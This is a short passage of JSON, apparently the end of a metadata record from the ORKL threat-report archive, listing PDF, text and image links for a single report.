		"pdf": "https://archive.orkl.eu/61ee4d2259264c9936cf509052ff3b5a021fd33e.pdf",
		"text": "https://archive.orkl.eu/61ee4d2259264c9936cf509052ff3b5a021fd33e.txt",
		"img": "https://archive.orkl.eu/61ee4d2259264c9936cf509052ff3b5a021fd33e.jpg"
	}
}